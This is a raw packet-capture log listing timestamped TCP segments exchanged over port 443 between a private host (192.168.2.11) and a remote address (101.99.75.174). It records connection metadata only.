                                                          Dec 6, 2024 15:42:38.507293940 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.510118008 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.510196924 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.510207891 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.512769938 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.512854099 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.512866020 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.515372992 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.515453100 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.515465021 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.518676996 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.519040108 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.519052982 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.559427977 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.571912050 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.572017908 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.573788881 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.573857069 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.573874950 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.621920109 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.675489902 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.675504923 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.675571918 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.677062988 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.677071095 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.677134037 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.677560091 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.677613974 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.680844069 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.680938005 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.680952072 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.681047916 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.683446884 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.683537006 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.686180115 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.686261892 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.686285019 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.688615084 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.688678026 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.688710928 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.691823006 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.691915989 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.691937923 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.694432974 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.694494009 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.694510937 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.697050095 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.697130919 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.697154999 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.700448990 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.700506926 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.700526953 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.702600002 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.702655077 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.702668905 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.705888033 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.705959082 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.705974102 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.708657980 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.708731890 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.708748102 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.711204052 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.711286068 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:38.711322069 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.764153957 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:38.764208078 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.834578991 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.837047100 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.837107897 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.837131977 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.839780092 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.839847088 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.839869022 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.842283964 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.842381001 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.842398882 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.845640898 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.845701933 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.845720053 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.848321915 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.848390102 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.848409891 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.850940943 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.851025105 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.851047039 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.854172945 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.854233027 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.854263067 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.856787920 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.856852055 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.856870890 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.859739065 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.859808922 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.859828949 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.862344980 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.862430096 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.862452030 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.865019083 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.865092039 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.865113020 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.918831110 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.919275999 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.919292927 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.919348955 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.919362068 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.921561003 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.921636105 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:39.921643972 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:39.965682983 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.020466089 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.020484924 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.020580053 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.020613909 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.022559881 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.022619009 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.022627115 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.022653103 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.022699118 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.025979042 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.025993109 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.026051044 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.026081085 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.026143074 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.028513908 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.028582096 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.031055927 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.031126976 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.033308983 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.033785105 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.033840895 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.033859968 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.036978006 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.037028074 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.037048101 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.039628029 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.039705992 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.039722919 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.042239904 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.042326927 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.042344093 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.044862032 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.044939995 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.044965029 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.048188925 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.048265934 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.048280954 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.050440073 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.050514936 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.050523996 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.053767920 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.053843021 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.053852081 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.056253910 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.056320906 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.056332111 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.059034109 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.059096098 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.059106112 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.069274902 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.112845898 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.112926960 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.115514040 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.115581036 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.115592957 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.168795109 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.214068890 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.214085102 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.214158058 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.216691971 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.216698885 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.216742992 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.216770887 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.216782093 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.219942093 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.220017910 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.220036983 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.222395897 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.222457886 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.222469091 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.225153923 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.225225925 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.225234032 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.227699041 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.227762938 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.227775097 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.231086016 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.231165886 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.231177092 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.233580112 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.233649015 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.233664036 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.236279964 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.236340046 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.236349106 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.239749908 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.239824057 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.239833117 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.242214918 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.242285013 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.242292881 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.245127916 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.245196104 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.245203018 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.247782946 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.247850895 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.247859001 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.250421047 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.250494957 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.250504017 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.293797016 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.317183018 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.317198992 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.317272902 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.323014021 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.323096991 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.323122025 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.371972084 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.405742884 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.405754089 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.405875921 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.408962965 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.408970118 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.409044981 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.409055948 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.411583900 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.411664009 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.411673069 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.414216995 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.414295912 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.414323092 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.416889906 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.416969061 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.416997910 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.420131922 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.420222044 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.420236111 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.422625065 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.422691107 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.422700882 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.425399065 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.425482988 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.425492048 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.428668022 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.428740025 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.428749084 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.431179047 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.431266069 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.431273937 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.433880091 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.433964968 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.433974028 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.436794043 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.436876059 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.436886072 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.439464092 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.439543962 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.439552069 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.442034960 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.442106009 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.442115068 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.496970892 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.540020943 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.540043116 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.540163994 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.540199995 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.542126894 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.542201042 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.542216063 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.590682983 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.598978996 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.598989964 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.599049091 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.601300955 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.601313114 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.601372004 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.601392984 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.604022980 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.604053974 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.604080915 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.604099035 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.604118109 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.607085943 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.607156992 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.607172966 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.609566927 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.609626055 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:40.609641075 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:40.612054110 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.598009109 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.598022938 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.600442886 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.600511074 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.600519896 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.653220892 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.694627047 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.694643974 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.694710016 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.697021008 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.697093964 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.697110891 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.747025013 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.756197929 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.756211996 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.756285906 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.758176088 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.758188963 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.758245945 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.761445999 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.761456013 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.761514902 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.761531115 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.764023066 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.764166117 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.764205933 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.766742945 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.766803980 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.766817093 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.769464016 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.769524097 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.769532919 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.773135900 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.773211956 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.773222923 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.775353909 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.775417089 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.775424004 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.777827024 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.777884007 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.777892113 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.780412912 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.780488014 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.780498028 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.783412933 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.783478975 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.783490896 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.786875963 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.786932945 CET49794443192.168.2.11101.99.75.174
                                                          Dec 6, 2024 15:42:41.786942005 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.789452076 CET44349794101.99.75.174192.168.2.11
                                                          Dec 6, 2024 15:42:41.789521933 CET49794443192.168.2.11101.99.75.174
